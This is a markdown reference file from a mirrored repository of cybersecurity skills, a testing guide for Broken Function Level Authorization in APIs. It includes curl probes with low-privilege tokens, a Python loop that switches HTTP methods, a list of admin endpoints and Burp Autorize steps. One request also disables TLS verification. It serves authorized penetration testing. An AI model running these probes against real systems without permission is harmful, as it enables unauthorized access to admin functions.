creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-10 21:24:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
bb39fa73a9fe48e58b0118fe455d97d407c343f1
Anthropic-Cybersecurity-Skills/skills/exploiting-broken-function-level-authorization/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

2.3 KiB
Raw Blame History

API Reference: Broken Function Level Authorization (BFLA)

OWASP API5:2023 — Broken Function Level Authorization

Description

API endpoints expose functions that should be restricted to specific roles. Low-privileged users can invoke admin-level functionality.

Common Patterns

Pattern Example
Guessable admin paths /api/admin/users
Method switching POST allowed but PUT bypasses auth
Role parameter manipulation {"role": "admin"} in request
Vertical privilege escalation User accessing admin endpoints

Testing Methodology

Step 1: Discover Endpoints

# From OpenAPI spec
curl https://api.target.com/swagger.json | jq '.paths | keys'

# From JavaScript source
grep -oP '["'"'"']/api/[^"'"'"']+' app.js

Step 2: Test with Low-Priv Token

curl -H "Authorization: Bearer <low_priv_token>" \
     https://api.target.com/api/admin/users

Step 3: Test HTTP Method Switching

# If GET returns 403, try POST/PUT/DELETE
curl -X PUT -H "Authorization: Bearer <low_priv_token>" \
     https://api.target.com/api/admin/users/1

Python requests Library

Request with Token

headers = {"Authorization": f"Bearer {token}"}
resp = requests.get(url, headers=headers, timeout=10, verify=False)

Method Switching

for method in ["GET", "POST", "PUT", "DELETE", "PATCH"]:
    resp = requests.request(method, url, headers=headers, timeout=10)
    if resp.status_code < 400:
        print(f"Accessible via {method}: {resp.status_code}")

Common Admin Endpoints to Test

/admin
/api/admin
/api/v1/admin/users
/api/internal
/manage
/api/config
/api/debug
/api/users/all
/api/system/settings
/graphql (with admin mutations)

Burp Suite — Authorization Testing

Autorize Extension

  1. Install Autorize from BApp Store
  2. Set low-privilege cookie/token
  3. Browse application as admin
  4. Autorize replays requests with low-priv token
  5. Compare responses for authorization bypass

Response Analysis

Indicator Meaning
200 with data Full access (vulnerability)
200 empty body Possible partial bypass
403 Forbidden Properly restricted
401 Unauthorized Auth required
405 Method Not Allowed Method restricted
Reference in New Issue View Git Blame Copy Permalink